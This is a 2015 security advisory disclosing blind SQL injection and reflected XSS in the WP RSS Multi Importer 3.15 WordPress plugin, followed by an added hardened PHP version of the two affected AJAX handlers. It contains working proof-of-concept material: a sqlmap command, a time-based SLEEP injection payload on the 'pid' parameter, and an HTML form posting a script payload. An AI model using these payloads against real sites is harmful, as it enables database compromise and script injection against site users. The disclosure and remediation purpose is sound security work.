Subject: Blind SQL injection and Reflected XSS in WP RSS Multi Importer 3.15
Date: Wed, 8 Jul 2015 21:59:31 +0200


Plugin: WP RSS Multi Importer 3.15

Remote authenticated users can execute arbitrary SQL commands and inject HTML/JavaScript.

1. SQL injection (rssmi_fetch_feed_items())

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php?action=rssmi_fetch_items_now
Vulnerable parameter: pid

Please note that the attacker needs a valid post_id (post_type == rssmi_feed and post_status == publish).

Example PHP callstack:

fetch_feeds_for_id   [/wp-rss-multi-importer/inc/custom_posts.php:725]
rssmi_fetch_feed_items   [/wp-rss-multi-importer/inc/import_feeds.php:217]

Sqlmap verification:

sqlmap --cookie "..." --method POST --data "pid=148" -u "http://localhost/wp-admin/admin-ajax.php?action=rssmi_fetch_items_now" --dbms mysql -p pid

Parameter: pid (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: pid=148 AND (SELECT * FROM (SELECT(SLEEP(5)))xVME)

2. XSS (save_template_function())

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php?action=wprssmi_response
Vulnerable parameter: post_var


<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=wprssmi_response">
<input type="text" name="save_var" value="2" />
<input type="text" name="post_var" value="<script>alert('XSS');</script>" />
<input type="submit" />
</form>
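A hardened version of the two admin-ajax handlers, added here as an example and not the plugin's own code (the hook registration, nonce action names, capability, table name and option name are assumptions): it accepts pid only as the ID of a published rssmi_feed post and binds it with $wpdb->prepare(), and it sanitises post_var with wp_kses_post() before storing and escapes it with esc_html() when it is reflected.

```php
<?php
// Added example, not the plugin's code: hook names, nonce action names,
// the capability, the table name and the option name are assumptions.

add_action( 'wp_ajax_rssmi_fetch_items_now', 'hardened_rssmi_fetch_items_now' );
add_action( 'wp_ajax_wprssmi_response',      'hardened_wprssmi_response' );

function hardened_rssmi_fetch_items_now() {
    global $wpdb;
    // Both actions are reachable by any logged-in user through admin-ajax.php,
    // so require a nonce and a capability before touching any input.
    check_ajax_referer( 'rssmi_fetch_items', 'nonce' );          // nonce action assumed
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // pid must be a post ID: coerce to a non-negative integer, reject anything else.
    $pid  = isset( $_POST['pid'] ) ? absint( $_POST['pid'] ) : 0;
    $post = $pid ? get_post( $pid ) : null;
    if ( ! $post || 'rssmi_feed' !== $post->post_type || 'publish' !== $post->post_status ) {
        wp_send_json_error( 'invalid pid', 400 );
    }
    // Even though $pid is now an integer, never interpolate it: bind with %d.
    $items = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}rssmi_items WHERE feed_id = %d", // table assumed
            $pid
        )
    );
    wp_send_json_success( $items );
}

function hardened_wprssmi_response() {
    check_ajax_referer( 'wprssmi_response', 'nonce' );           // nonce action assumed
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $save_var = isset( $_POST['save_var'] ) ? absint( $_POST['save_var'] ) : 0;
    // wp_kses_post() strips <script> and event-handler attributes before storage.
    $post_var = isset( $_POST['post_var'] )
        ? wp_kses_post( wp_unslash( $_POST['post_var'] ) )
        : '';
    update_option( 'rssmi_template_' . $save_var, $post_var ); // option name assumed
    // Escape again on output, so "<script>alert('XSS');</script>" is rendered as text.
    echo esc_html( $post_var );
    wp_die();
}
```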

Marcin Probola,